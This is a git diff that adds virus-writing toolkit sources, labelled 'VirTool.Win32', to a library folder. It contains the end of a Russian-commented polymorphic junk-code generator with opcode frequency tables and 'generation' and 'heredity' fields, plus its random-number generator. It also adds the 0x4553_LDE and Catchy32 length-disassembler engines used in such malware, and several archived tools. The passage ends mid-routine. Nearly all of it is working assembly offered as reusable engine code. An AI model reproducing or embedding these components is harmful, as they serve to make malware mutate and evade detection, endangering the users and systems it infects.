+						; таблицу однобайтных
+						; инструкций
+		mov	eax,8			; Генерируем случайное число
+		call	brandom32		; в диапазоне 0..7
+		add	esi,eax			; Прибавляем к esi - eax 
+		movsb				; Помещаем инструкцию
+						; из таблицы в буфер
+						; В итоге у нас получается
+						; случайно выбранная
+						; инструкция из таблицы:
+						; .............................
+						; 	cld             
+						; 	nop             
+__q__:						; .............................
+		dec	ecx			; Уменьшаем ecx на единицу
+		ret				; Возврат из подпрограммы
+
+;----[Подпрограмма получающая случайный свободный регистр]---------------------;
+
+free_reg:                                          
+						; Подпрограмма получения
+						; свободного регистра
+
+		push	edx ecx			; Сохраняем в стэке edx, ecx
+another:					;
+
+		call	rnd_reg			;
+		bt      ebx, eax		; Определяем используемый
+		jc     another			; случайный регистр
+
+		pop	ecx edx			; Восстанавливаем ecx, edx
+		ret				; Возврат из подпрограммы
+
+;----[Подпрограмма получающая случайный регистр]-------------------------------;
+
+rnd_reg:                                           
+						; Подпрограмма получения
+						; случайного регистра
+
+		mov	eax,8			; Получаем случайное число
+		call	brandom32		; в диапазоне 0..7
+		ret				; Возврат из подпрограммы
+
+;----[Таблица смещений на подпрограммы]----------------------------------------;
+
+mega_table:
+		dw	__x87		-__st__ 	;
+		dw	__mov_r32_r32	-__st__ 	; 
+		dw	__push_r32	-__st__ 	; 
+		dw	__push_r32_2	-__st__ 	; 
+		dw	__push_imm32	-__st__ 	; 
+		dw	__shl_r32_imm8	-__st__ 	; 
+		dw	__cmp_r32_r32	-__st__ 	;
+		dw	__xor_r32_r32	-__st__ 	;
+		dw	__one_byte	-__st__ 	;
+		dw	__mov_r32_imm32	-__st__ 	;
+		dw	__jxx_short	-__st__ 	; Таблица относительных
+		dw	__jxx_near	-__st__ 	; смещений от метки 
+		dw	__add_r32_imm32	-__st__ 	; delta_offset
+		dw	__jmp_short	-__st__ 	;
+		dw	__lea_r32_imm32	-__st__ 	;
+		dw	__test_r32_r32	-__st__ 	;
+		dw	__not_r32	-__st__ 	;
+		dw	__xadd_r32_r32	-__st__ 	;
+		dw	__mov_r16_imm16	-__st__ 	;
+		dw	__cmova_r32_r32	-__st__ 	; 
+		dw	__call_near	-__st__ 	;
+
+;----[Таблица однобайтовых опкодов]--------------------------------------------;
+
+__1_byte_opcode:
+		std				;
+		cld				; Таблица однобайтовых
+		nop				; инструкций
+		clc				;
+		stc				;
+		cmc				;
+		db	0f2h			; rep
+		db	0f3h			; repnz
+
+;----[Таблица трёхбайтовых опкодов]--------------------------------------------;
+
+__3_byte_opcode:
+db	0a3h,0abh,0adh,0b3h,0bbh,0bdh,0bfh	; Таблица трёхбайтовых
+db	0b6h,0b7h,0beh,0afh,0bch,0c1h,0bdh	; инструкций
+
+;----[Таблица мат. ожиданий опкодов]-------------------------------------------;
+
+__freq_table:
+		dw	10			; x87(0xdc)
+		dw	209			; mov r32,r32(0x8b)
+		dw	107			; push r32/pop r32(0x50)
+		dw	147			; push r32(0xff,0x6a)
+		dw	32			; push imm32(0x68)
+		dw	6			; ror/shl r32,imm8(0xc1)
+		dw	5			; cmp r32,r32(0x3ah)
+		dw	43			; xor r32,r32(0x33)
+		dw	8			; rep/repnz(0xf3)
+		dw	22			; mov r32,imm32(0xb8)
+		dw	82			; je short(0x70..0x7fh)
+		dw	18			; je near(0x0f)
+		dw	78			; add/or r32,imm32(0x81..0x85)
+		dw	30			; jmp short(0xeb)
+		dw	63			; lea r32,imm32(0x8d)
+		dw	1			; test r32/r8,r32/r8(0x84,0x85)
+		dw	1			; not/neg(0xf7)
+		dw	23			; xadd/imul r32,r32(0x0f)
+		dw	6			; mov r16,imm16(0x66)
+		dw	13			; cmova r32,r32(0x0f)
+		dw	95			; call near(0xe8)
+
+;----[Количество поколений]----------------------------------------------------;
+
+__generation	dd	9
+
+;----[Наследственность]--------------------------------------------------------;
+
+__cross1	dd	0
+__cross2	dd      0
+
+;----[Определения регистров]---------------------------------------------------;
+
+_eax		equ     00000001h		;
+_ecx		equ     00000002h		;
+_edx		equ     00000004h		;
+_ebx		equ     00000008h		;
+_esp		equ     00000010h		; Определения регистров
+_ebp		equ     00000020h		; спасибо Z0MBiE :)
+_esi		equ     00000040h		;
+_edi		equ     00000080h		;
+;------------------------------------------------------------------------------;
+</src>
+<p>Для работы данного движка необходима новая версия - ГЕНЕРАТОР СЛУЧАЙНОГО ЧИСЛА.</p>
+<src lang="asm">
+;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%;
+; ГЕНЕРАТОР СЛУЧАЙНОГО ЧИСЛА V. 0.3 (x) 2004 СЛОН http://slon.wronger.com      ;
+;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%;
+; Интервал:		[0..eax-1]                                             ;
+;------------------------------------------------------------------------------;
+; Использование:        call	r_init                                         ;
+;			mov	eax,ГРАНИЦА ИНТЕРВАЛА                          ;
+;			call	brandom32                                      ;
+;------------------------------------------------------------------------------;
+; Результат:		число в интервале [0..ГРАНИЦА ИНТЕРВАЛА]               ;
+;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%;
+
+;----[Подпрограмма инициализации генератора случайных чисел]-------------------;
+
+r_init:
+		push	ebp eax edx		; Сохраняем в стэке ebp,eax,edx
+
+		call	__delta1_		;
+__delta1_:	pop	ebp			; Получение дельта смещения
+		sub	ebp,offset __delta1_	;
+
+		db	0fh,031h		; Получаем случайное зерно
+		mov	rand_seed,eax		;
+
+		pop	edx eax ebp		; Восстанавливаем edx,eax,ebp
+
+		ret				; Возврат из подпрограммы
+
+;----[Подпрограмма генерации случаного чмсла в диапазоне]----------------------;
+
+brandom32:					; Эта подпрограмма 
+						; возвращает случайное число
+						; в диапазоне 0..eax-1
+
+		push	edx ecx	ebp		; Сохраняем в стэке edx,ecx,ebp
+
+		call	__delta2_		;
+__delta2_:	pop	ebp			; Получение дельта смещения
+		sub	ebp,offset __delta2_	;
+
+		imul	eax,eax,100		; Умножаем eax на 100
+		push	eax			; и сохраняем eax в стэке
+
+		call	random32		; Вызываем подпрограмму
+						; генерации случайного числа
+		xor	edx,edx			; Обнуляем edx
+		pop	ecx			; Восстанавливаем значение
+						; из стэка в ecx
+		div	ecx			; Делим eax на ecx
+		xchg	eax,edx			; Помещаем остаток в eax
+		xor	edx,edx			; Обнуляем edx
+		push	100			; Помещаем в ecx - 100
+		pop	ecx			;
+		div	ecx			; Делим eax на ecx
+		pop	ebp ecx edx		; Восстанавливаем ebp,ecx,edx,
+		ret				; Возврат из подпрограммы
+
+;----[Подпрограмма генерации случайного числа]---------------------------------;
+
+random32:
+		push	ebp
+
+		call	__delta3_		;
+__delta3_:	pop	ebp			; Получение дельта смещения
+		sub	ebp,offset __delta3_	;
+
+                mov     eax,12345678h		;
+		rand_seed= dword ptr $-4	; 
+		imul	eax,00019660Dh		; 
+		add	eax,03C6EF35Fh		; Математические операции для
+		mov     [ebp+rand_seed],eax	; получения случайного числа
+		shr     eax,16			;
+		imul    eax,[esp+4]		;
+
+		pop	ebp
+
+		retn				; Возврат из подпрограммы
\ No newline at end of file
diff --git a/libs/VirTool.Win32.Cryptor.Yspe.7z b/libs/VirTool.Win32.Cryptor.Yspe.7z
new file mode 100644
index 00000000..793be4c6
Binary files /dev/null and b/libs/VirTool.Win32.Cryptor.Yspe.7z differ
diff --git a/libs/VirTool.Win32.Disassembler.4553_LDE.txt b/libs/VirTool.Win32.Disassembler.4553_LDE.txt
new file mode 100644
index 00000000..65aab850
--- /dev/null
+++ b/libs/VirTool.Win32.Disassembler.4553_LDE.txt
@@ -0,0 +1,901 @@
+/*
+*
+*       ____| |           |                  _)       ___|              |
+*       __|   |  _ \  __| __|  __| _ \  __ \  |  __|\___ \   _ \  |   | |  __|
+*       |     |  __/ (    |   |   (   | |   | | (         | (   | |   | |\__ \
+*      _____|_|\___|\___|\__|_|  \___/ _|  _|_|\___|_____/ \___/ \____|_|____/
+*      	    
+*        			    Presents
+*
+*		[ 0x4553_LDE - 16/32-bit Length Disassembler Engine ]
+*		
+*					    (c) Ares, 2003
+*					    
+*[-----------------------------------------------------------------------------------]
+*  Description:
+* It based on ADE32 disassembler engine by z0mbie, modified and ported to AT&T asm.
+*
+* table.h - contain table of opcodes from 0x00 to 0xFF, 
+* it define the type of each other.
+* 
+*  Usage:
+* There is the main function l_disasm(). It get one parameter from stack, 
+* which point to array with data. Return value reside in %eax - length of opcode.
+*
+*  Example:
+* ...
+* mov data,%eax		
+* add $123,%eax		# data[123]
+* push %eax
+* call l_disasm
+* ...
+*
+* Section Headers:
+*    [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
+*    [ 0]                   NULL            00000000 000000 000000 00      0   0  0
+*    [ 1] .text             PROGBITS        08048074 000074 0002c2 00  AX  0   0  4
+*    [ 2] .data             PROGBITS        08049380 000380 000800 00  WA  0   0  4
+*    ...
+*                                                           = AA5(hex) = 2725(dec)	
+*
+*[-----------------------------------------------------------------------------------]
+*
+* version: 1.0BETA
+*
+*/
+
+.include "table.h"
+.text
+# little defines
+diza = 12
+buffer = -4
+flag1 = -52
+flag2 = -51
+opcode = -53
+t = -60
+mod = -61
+rm = -62
+a = -68
+b = -72 
+counter = -76
+
+.globl l_disasm
+l_disasm:
+	pushl %ebp
+	movl %esp,%ebp
+
+	movl 8(%ebp),%eax		
+	movl %eax,buffer(%ebp)		# buf
+	leal -48(%ebp),%eax		# temp diza structure
+	movl %eax,diza(%ebp)		# diza
+
+	movb $4,1(%eax)                 # filling structure
+	movb $4,(%eax)
+
+	movl $0,flag1(%ebp)		# flag1 = 0
+
+loop:
+	movl buffer(%ebp),%eax
+	movb (%eax),%dl
+	movb %dl,opcode(%ebp)		# opcode
+	incl buffer(%ebp)		# buf++;
+	movzbl opcode(%ebp),%eax	 
+	leal 0(,%eax,4),%edx
+	movl $op_tab,%eax
+	movl (%edx,%eax),%edx
+	movl %edx,t(%ebp)		# t = op_tab[opcode]
+	movb t(%ebp),%al
+	andb $0xF8,%al
+	testb %al,%al
+	je check_opcode
+	movl flag1(%ebp),%eax
+	andl t(%ebp),%eax
+	testl %eax,%eax
+	jne return
+
+	movl t(%ebp),%edx
+	orl %edx,flag1(%ebp)
+
+# prefix/mod/rm/flags/opcodes...checking
+# no reason to comment all this stuff...
+
+check_prefix:
+
+	movb t(%ebp),%al
+	test %esi,%esi
+	jne chp1
+	andb $0x10,%al
+	testb %al,%al
+	je chp1
+	jmp chpn
+chp1:
+	movb t(%ebp),%al
+	incl %esi
+	andb $0x20,%al
+	testb %al,%al
+	je cp_sub2
+chpn:
+	movl diza(%ebp),%eax
+	movl diza(%ebp),%edx
+	movb 1(%edx),%cl
+	xorb $6,%cl
+	movb %cl,1(%eax)
+	jmp loop
+
+cp_sub2:
+	movb t(%ebp),%al
+	andb $0x80,%al
+	testb %al,%al
+	je cp_sub3
+        movl diza(%ebp),%eax
+	movb opcode(%ebp),%dl
+	movb %dl,21(%eax)
+	jmp loop
+
+cp_sub3:
+	movb t(%ebp),%al
+	andb $0x40,%al
+	testb %al,%al
+	je loop
+	movl diza(%ebp),%eax
+	movb opcode(%ebp),%dl
+	movb %dl,20(%eax)
+
+check_opcode:
+	movl t(%ebp),%eax
+	orl %eax,flag1(%ebp)
+	movl diza(%ebp),%eax
+	movb opcode(%ebp),%dl
+	movb %dl,22(%eax)
+	cmpb $15,opcode(%ebp)
+	jne co_sub1
+	movl buffer(%ebp),%ebx
+	movb (%ebx),%al
+	movb %al,opcode(%ebp)
+	incl buffer(%ebp)
+	movl diza(%ebp),%eax
+	movb opcode(%ebp),%dl
+	movb %dl,23(%eax)
+	movzbl opcode(%ebp),%eax
+	leal 256(%eax),%edx
+	leal 0(,%edx,4),%eax
+	movl $op_tab,%edx
+	movl (%eax,%edx),%ecx
+	orl %ecx,flag1(%ebp)
+	cmpl $-1,flag1(%ebp)
+	jne check_mod
+	jmp return
+
+co_sub1:
+	cmpb $0xF7,opcode(%ebp)
+	jne co_sub2
+	movl buffer(%ebp),%eax
+	movb (%eax),%dl
+	andb $0x38,%dl
+	testb %dl,%dl
+	jne check_mod
+	orb $0x20,flag2(%ebp)
+	jmp check_mod
+
+co_sub2:
+	cmpb $0xF6,opcode(%ebp)
+	jne check_mod
+	movl buffer(%ebp),%eax
+	movb (%eax),%dl
+	andb $0x38,%dl
+	testb %dl,%dl
+	jne check_mod
+	orb $1,flag2(%ebp)
+
+check_mod:
+	movl flag1(%ebp),%eax
+	andl $0x4000,%eax
+	testl %eax,%eax
+	je checks_complete
+	movl buffer(%ebp),%edi
+	movb (%edi),%al
+	movb %al,opcode(%ebp)
+	incl buffer(%ebp)
+	movl diza(%ebp),%eax
+	movb opcode(%ebp),%dl
+	movb %dl,24(%eax)
+	movb opcode(%ebp),%al
+	andb $0x38,%al
+	cmpb $0x20,%al
+	jne cm_sub1
+	movl diza(%ebp),%eax
+	cmpb $0xFF,22(%eax)
+	jne cm_sub1
+	orb $4,-50(%ebp)		# flag
+
+cm_sub1:				
+	movb opcode(%ebp),%al
+	andb $0xC0,%al
+	movb %al,mod(%ebp)
+	movb opcode(%ebp),%dl
+	andb $7,%dl
+	movb %dl,rm(%ebp)
+	cmpb $0xC0,mod(%ebp)
+	je checks_complete
+	movl diza(%ebp),%eax
+	cmpb $4,(%eax)
+	jne cm_sub5
+	cmpb $4,rm(%ebp)
+	jne cm_sub2
+	orb $8,flag2(%ebp)
+	movl buffer(%ebp),%edi
+	movb (%edi),%al
+	movb %al,opcode(%ebp)
+	incl buffer(%ebp)
+	movl diza(%ebp),%eax
+	movb opcode(%ebp),%dl
+	movb %dl,25(%eax)
+	movb opcode(%ebp),%cl
+	andb $7,%cl
+	movb %cl,rm(%ebp)
+
+cm_sub2:
+	cmpb $0x40,mod(%ebp)
+	jne cm_sub3
+	orb $1,flag1(%ebp)
+	jmp checks_complete
+
+cm_sub3:
+	cmpb $0x80,mod(%ebp)
+	jne cm_sub4
+	orb $4,flag1(%ebp)
+	jmp checks_complete
+
+cm_sub4:
+	cmpb $5,rm(%ebp)
+	jne checks_complete
+	orb $4,flag1(%ebp)
+	jmp checks_complete
+
+cm_sub5:
+	cmpb $0x40,mod(%ebp)
+	jne cm_sub6
+	orb $1,flag1(%ebp)
+	jmp checks_complete
+
+cm_sub6:
+	cmpb $0x80,mod(%ebp)
+	jne cm_sub7
+	orb $2,flag1(%ebp)
+	jmp checks_complete
+
+cm_sub7:
+	cmpb $6,rm(%ebp)
+	jne checks_complete
+	orb $2,flag1(%ebp)
+
+checks_complete:
+	movl diza(%ebp),%eax
+	movl flag1(%ebp),%edx
+	movl %edx,8(%eax)
+	movl flag1(%ebp),%eax
+	andl $7,%eax
+	movl %eax,a(%ebp)
+
+	movl flag1(%ebp),%edx
+	andl $0x700,%edx
+	shrl $8,%edx
+	movl %edx,b(%ebp)
+	movl flag1(%ebp),%eax
+	andl $0x1000,%eax
+	testl %eax,%eax
+	je cc_sub1
+	movl diza(%ebp),%eax
+	movzbl (%eax),%edx
+	addl %edx,a(%ebp)
+
+cc_sub1:
+	movl flag1(%ebp),%eax
+	andl $0x2000,%eax
+	testl %eax,%eax
+	je cc_sub2
+	movl diza(%ebp),%eax
+	movzbl 1(%eax),%edx
+	addl %edx,b(%ebp)
+cc_sub2:
+	movl diza(%ebp),%eax
+	movl a(%ebp),%edx
+	movl %edx,diza(%eax)
+	movl diza(%ebp),%eax
+	movl b(%ebp),%edx
+	movl %edx,16(%eax)
+	movl $0,counter(%ebp)
+cc_sub3:
+	movl counter(%ebp),%eax
+	cmpl a(%ebp),%eax
+	jnb cc_sub4
+	movl diza(%ebp),%edx
+	leal 28(%edx),%eax
+	movl counter(%ebp),%edx
+	movl buffer(%ebp),%ecx
+	movl %ecx,(%edx,%eax)
+	incl buffer(%ebp)
+	incl counter(%ebp)
+	jmp cc_sub3
+cc_sub4:
+	movl $0,counter(%ebp)
+cc_sub5:
+	movl counter(%ebp),%eax
+	cmpl b(%ebp),%eax
+	jnb cc_sub6
+	movl diza(%ebp),%edx
+	leal 36(%edx),%eax
+	movl counter(%ebp),%edx
+	movl buffer(%ebp),%ecx
+	movl %ecx,(%edx,%eax)
+	incl buffer(%ebp)
+	incl counter(%ebp)
+	jmp cc_sub5
+cc_sub6:
+	movl buffer(%ebp),%eax
+	subl 8(%ebp),%eax
+
+return:
+	leave
+	ret
+
+
+/****************************************************
+.include "0x4553_LDE.s"
+.globl main
+main:
+
+push %ebp
+mov %esp,%ebp
+
+push $2
+push $file
+call open
+mov %eax,fd
+
+push $424
+call malloc
+mov %eax,data
+
+push $424
+push data
+push fd
+call read
+
+mov data,%eax
+add $0x74,%eax		# entry point, first instruction - xor %eax,%eax
+push %eax
+call l_disasm
+
+push %eax
+push $l
+call printf
+
+call exit
+
+l:.string"Lenght of instruction: %d\n" 
+file: .string "test"
+
+.comm fd,4,4
+.comm data,424,4
+*****************************************************/
+
+/****************************************************
+table.h
+
+.globl op_tab
+.data
+op_tab:
+	.long 16384 	# 0x00
+	.long 16384	# 0x01
+	.long 16384	# 0x02
+	.long 16384	# ...
+	.long 256
+	.long 8192
+	.long 32768
+	.long 32768
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 256
+	.long 8192
+	.long 32768
+	.long 65536
+	.long 49152
+	.long 16384
+	.long 49152
+	.long 16384
+	.long 33024
+	.long 40960
+	.long 32768
+	.long 32768
+	.long 49152
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 33024
+	.long 40960
+	.long 32768
+	.long 32768
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 256
+	.long 8192
+	.long 32896
+	.long 32768
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 256
+	.long 8192
+	.long 32896
+	.long 32768
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 256
+	.long 8192
+	.long 32896
+	.long 32768
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 256
+	.long 8192
+	.long 32896
+	.long 32768
+	.long 0
+	.long 0
+	.long 0
+	.long 0
+	.long 32768
+	.long 0
+	.long 0
+	.long 0
+	.long 0
+	.long 0
+	.long 0
+	.long 0
+	.long 32768
+	.long 0
+	.long 0
+	.long 0
+	.long 0
+	.long 0
+	.long 0
+	.long 0
+	.long 0
+	.long 0
+	.long 0
+	.long 0
+	.long 0
+	.long 0
+	.long 0
+	.long 0
+	.long 32768
+	.long 0
+	.long 0
+	.long 0
+	.long 32768
+	.long 32768
+	.long 49152
+	.long 49152
+	.long 128
+	.long 32896
+	.long 32
+	.long 16
+	.long 8192
+	.long 24576
+	.long 256
+	.long 16640
+	.long 32768
+	.long 32768
+	.long 32768
+	.long 32768
+	.long 164096
+	.long 164096
+	.long 131328
+	.long 131328
+	.long 131328
+	.long 131328
+	.long 131328
+	.long 131328
+	.long 131328
+	.long 131328
+	.long 164096
+	.long 164096
+	.long 131328
+	.long 131328
+	.long 131328
+	.long 131328
+	.long 16640
+	.long 24576
+	.long 49408
+	.long 16640
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 49152
+	.long 16384
+	.long 49152
+	.long 16384
+	.long 0
+	.long 0
+	.long 0
+	.long 32768
+	.long 32768
+	.long 32768
+	.long 32768
+	.long 32768
+	.long 32768
+	.long 0
+	.long 41472
+	.long 0
+	.long 32768
+	.long 32768
+	.long 32768
+	.long 32768
+	.long 4096
+	.long 4096
+	.long 4096
+	.long 4096
+	.long 0
+	.long 0
+	.long 0
+	.long 0
+	.long 256
+	.long 8192
+	.long 0
+	.long 0
+	.long 0
+	.long 32768
+	.long 0
+	.long 32768
+	.long 256
+	.long 256
+	.long 256
+	.long 256
+	.long 256
+	.long 256
+	.long 33024
+	.long 33024
+	.long 8192
+	.long 8192
+	.long 8192
+	.long 8192
+	.long 40960
+	.long 8192
+	.long 8192
+	.long 8192
+	.long 16640
+	.long 16640
+	.long 262656
+	.long 262144
+	.long 49152
+	.long 49152
+	.long 16640
+	.long 24576
+	.long 768
+	.long 0
+	.long 295424
+	.long 294912
+	.long 32768
+	.long 256
+	.long 32768
+	.long 294912
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 33024
+	.long 33024
+	.long 32768
+	.long 32768
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 164096
+	.long 164096
+	.long 131328
+	.long 131328
+	.long 33024
+	.long 33024
+	.long 33024
+	.long 33024
+	.long 139264
+	.long 401408
+	.long 41472
+	.long 393472
+	.long 32768
+	.long 32768
+	.long 32768
+	.long 32768
+	.long 32776
+	.long 32768
+	.long 64
+	.long 64
+	.long 32768
+	.long 32768
+	.long 16384
+	.long 16384
+	.long 0
+	.long 0
+	.long 32768
+	.long 32768
+	.long 0
+	.long 0
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long -1
+	.long -1
+	.long 0
+	.long -1
+	.long 0
+	.long 0
+	.long 0
+	.long 0
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long 139264
+	.long 139264
+	.long 139264
+	.long 139264
+	.long 139264
+	.long 139264
+	.long 139264
+	.long 139264
+	.long 139264
+	.long 139264
+	.long 139264
+	.long 139264
+	.long 139264
+	.long 139264
+	.long 139264
+	.long 139264
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 0
+	.long 0
+	.long 0
+	.long 16384
+	.long 16640
+	.long 16384
+	.long -1
+	.long -1
+	.long 0
+	.long 0
+	.long 0
+	.long 16384
+	.long 16640
+	.long 16384
+	.long -1
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long -1
+	.long -1
+	.long 16640
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long 16384
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long 0
+	.long 0
+	.long 0
+	.long 0
+	.long 0
+	.long 256
+	.long 0
+	.long 0
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1
+	.long -1	# 0xff
+*****************************************************/
diff --git a/libs/VirTool.Win32.Disassembler.Ade.7z b/libs/VirTool.Win32.Disassembler.Ade.7z
new file mode 100644
index 00000000..a333a9bb
Binary files /dev/null and b/libs/VirTool.Win32.Disassembler.Ade.7z differ
diff --git a/libs/VirTool.Win32.Disassembler.Ade86.7z b/libs/VirTool.Win32.Disassembler.Ade86.7z
new file mode 100644
index 00000000..a9c27e16
Binary files /dev/null and b/libs/VirTool.Win32.Disassembler.Ade86.7z differ
diff --git a/libs/VirTool.Win32.Disassembler.Bpde.7z b/libs/VirTool.Win32.Disassembler.Bpde.7z
new file mode 100644
index 00000000..e87fcfcf
Binary files /dev/null and b/libs/VirTool.Win32.Disassembler.Bpde.7z differ
diff --git a/libs/VirTool.Win32.Disassembler.Catchy32.inc b/libs/VirTool.Win32.Disassembler.Catchy32.inc
new file mode 100644
index 00000000..1602963d
--- /dev/null
+++ b/libs/VirTool.Win32.Disassembler.Catchy32.inc
@@ -0,0 +1,174 @@
+; Catchy32 v1.6-2 - Length Disassembler Engine 32bit
+; original source Catchy32.inc-orig (c) sars [HI-TECH] 2003
+; this slightly opimized version - herm1t'2004
+		BITS	32
+		CPU	386
+		global	catchy32
+
+pref66h 	equ	1
+pref67h 	equ	2
+
+catchy32:	pushad
+		mov	esi, [esp + 36]		; pointer to opcode
+		sub	esp, 256		; allocate space for the table in stack
+		mov	ebp, esp		; ebp <- opcode table
+		mov	edi, esp
+		push	esi
+;; (1) unpack table
+		mov	edx, esp		; save stack pointer
+		push	115
+		pop	ecx
+		call	.data
+		db      0x45,0x29,0x20,0x45,0x29,0x20,0x45,0x29
+		db      0x20,0x45,0x29,0x20,0x45,0x29,0x36,0x45
+		db      0x29,0x36,0x45,0x29,0x36,0x45,0x29,0x36
+		db      0xe0,0xe0,0x60,0x25,0x57,0x30,0x28,0x40
+		db      0xe7,0x27,0x2c,0x2b,0xc5,0xa0,0x31,0x40
+		db      0x4f,0x40,0x29,0x60,0x87,0x8f,0x2b,0x2d
+		db      0x25,0x2c,0x2e,0x2d,0x22,0x20,0x45,0x27
+		db      0x20,0x85,0x87,0x2f,0x32,0x40,0x36,0x37
+		db      0x20,0x25,0x60,0x65,0x33,0x40,0x35,0x34
+		db      0x23,0x85,0x26,0x75,0x45,0x46,0x85,0x60
+		db      0xb5,0xe5,0xe5,0xe5,0x65,0x4b,0x25,0x24
+		db      0x85,0xef,0x2f,0xe5,0x25,0x20,0x21,0x2a
+		db      0x25,0x20,0x21,0x2a,0xa5,0x35,0x2a,0x65
+		db      0x2a,0x2b,0x2a,0x80,0x34,0xe5,0xe5,0x25
+		db      0x34,0xc5,0x26
+		; xlat table
+		db	0x00,0x01,0x02,0x03,0x10,0x11,0x1e,0x22
+		db	0x23,0x28,0x31,0x33,0x39,0x40,0x60,0x88
+		db	0x89,0xc0,0xc2,0xe0,0xe1,0xee,0xf0,0xff
+.data:		pop	esi
+		lea	ebx, [esi + ecx]
+		xor	eax, eax
+.next:		lodsb
+		push	ecx
+		mov	ecx, eax
+		shr	ecx, 5
+		and	al, 31
+		xlat
+		rep	stosb
+		pop	ecx
+		loop	.next
+		mov	esp, edx		; restore stack frame
+;; /unpack
+		pop	esi
+		push	edi			; (2)
+		mov	edi, esi		; (3)
+
+		cmp	word [esi], 20cdh	; VXD call (6 bytes)
+		jne	ExtFlags
+		inc	esi
+		inc	esi
+		lodsd
+CalcLen:	sub	esi, edi		; (3)
+		cmp	esi, 15
+		jbe 	OK
+Error:		xor	esi, esi
+		dec	esi
+OK:		pop	esp			; (2)
+		mov 	[esp+4*7], esi
+		popad
+		ret		
+		; ecx zero after loop
+;==============================================================================
+ExtFlags:	xor	eax, eax
+		xor	ebx, ebx	
+		cdq
+		lodsb				;al <- opcode
+		mov 	cl, al			;cl <- opcode
+		cmp	al, 0fh			;Test on prefix 0Fh
+		jne 	NormTable		
+		lodsb
+		inc 	ah			;EAX=al+100h (100h/2 - lenght first table)
+NormTable:	shr 	eax, 1			;Elements tables on 4 bits
+		mov 	al, byte [ebp + eax]
+		jc 	IFC1 
+		shr	eax, 4			;Get high 4-bits block if offset is odd, otherwise...
+IFC1:		and	al, 0fh
+		xchg 	eax, ebx		;EAX will be needed for other purposes
+CheckFlags:	cmp 	bl, 0Eh			;Test on ErrorFlag
+		je 	Error
+		cmp 	bl, 0Fh			;Test on PrefixFlag
+		je 	Prefix
+		or 	ebx, ebx		;One byte command   
+		jz 	CalcLen
+		btr	ebx, 0			;Command with ModRM byte
+		jc 	ModRM
+		btr 	ebx, 1			;Test on imm8,rel8 etc flag
+		jc 	incr1
+		btr	ebx, 2			;Test on ptr16 etc flag
+		jc 	incr2
+		and 	bl, 11110111b    	;Reset 16/32 sign 
+		cmp 	cl, 0A0h		;Processing group 0A0h-0A3h
+		jb	Check66h
